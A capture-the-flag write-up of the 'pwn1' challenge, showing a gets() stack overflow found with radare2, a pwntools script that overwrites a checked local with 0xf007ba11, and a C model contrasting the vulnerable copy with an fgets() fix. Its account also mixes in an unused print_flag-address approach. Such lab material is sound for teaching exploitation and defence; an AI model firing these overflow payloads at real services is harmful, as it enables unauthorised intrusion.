pwn1 asks the user to enter a passphrase.
This is a super secret program
Noone is allowed through except for those who know the secret!
What is my secret?
WHAT_DO_I_KNOW?
That is not the secret word!
So, I assume there will be some check somewhere.
I checked the output of the strings command to see whether a password was hardcoded into the program.
Nope, but nice try.
Time to give radare2 a chance. Let's analyse…
The input by itself is useless, because it is stored in eax
… but the check against the password (which is \xf0\x07\xba\x11) is performed on a local variable that is set to 0.
So, how can I pwn it?
Easy peasy! There is a gets without a length check: this means I can overwrite portions of the stack and do whatever I want with this program.
Even better, there is no canary!
I can write the password in the correct memory cell.
The exploit is some gibberish and then the address of the print_flag function.
BE CAREFUL: I assumed ASLR was disabled on the server.
So I opened a shell with ASLR disabled, got the address of print_flag and appended it to the exploit string.
My assumption was correct! There is no ASLR on server side.
I used pwntools for crafting and simplicity. This is the script:
    from pwn import *

    # Connect to the challenge service.
    exc = remote('pwn.ctf.tamu.edu', 4321)
    # 23 filler bytes fill the input buffer; p32 packs the expected value
    # 0xf007ba11 as 4 little-endian bytes into the local that gets checked.
    exc.sendline(b'A' * 23 + p32(0xf007ba11))
    exc.interactive()
23 is the length of the input string buffer on the stack (found with radare2).
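To show why 23 filler bytes put the value on the compared local, and what the fix looks like, here is an added C model of the check; it is not the challenge binary's code, and the frame layout, the constant, the offset and a little-endian x86 host are assumptions taken from this writeup.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define SECRET 0xf007ba11u  /* value the writeup says the local is compared with */

/* Model of the pwn1 frame as described: a 23-byte buffer immediately followed by
   the 4-byte local. pack(1) pins it at offset 23, matching the 23 filler bytes. */
#pragma pack(push, 1)
struct frame { char buf[23]; uint32_t secret; };
#pragma pack(pop)

/* Vulnerable form: the copy is not bounded by sizeof f.buf (gets() behaviour), so
   input bytes 23..26 land in f.secret. Stopping at sizeof f only keeps this demo
   memory-safe; the real gets() keeps writing past the frame. */
int check_passphrase_unsafe(const unsigned char *line, size_t len) {
    struct frame f;
    unsigned char *raw = (unsigned char *)&f;
    uint32_t seen;
    f.secret = 0;                       /* the "local variable set to 0" */
    for (size_t i = 0; i < len && i < sizeof f; i++)
        raw[i] = line[i];               /* overruns buf into secret */
    memcpy(&seen, raw + sizeof f.buf, sizeof seen);
    return seen == SECRET;
}

/* Hardened form: fgets() writes at most sizeof buf - 1 bytes plus a NUL, so input
   can never reach the adjacent local, and the local is never input-derived. */
int check_passphrase_safe(FILE *in) {
    char buf[23];
    uint32_t secret = 0;
    if (fgets(buf, sizeof buf, in) == NULL) return 0;
    buf[strcspn(buf, "\n")] = '\0';
    return secret == SECRET;
}

/* Runs the hardened check over raw bytes through a temporary stream. */
int check_passphrase_safe_bytes(const unsigned char *line, size_t len) {
    FILE *in = tmpfile();
    if (!in || fwrite(line, 1, len, in) != len) return -1;
    rewind(in);
    int r = check_passphrase_safe(in);
    fclose(in);
    return r;
}

/* Constructed sample mirroring the exploit string: 23 filler bytes followed by
   0xf007ba11 in little-endian order (the byte order pwntools' p32 emits). */
static const unsigned char SAMPLE_PAYLOAD[27] =
    "AAAAA" "AAAAA" "AAAAA" "AAAAA" "AAA" "\x11\xba\x07\xf0";
```

The unsafe model accepts the constructed sample because the overrun rewrites the local, while the fgets() version never lets the input reach it.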
Flag captured ;-)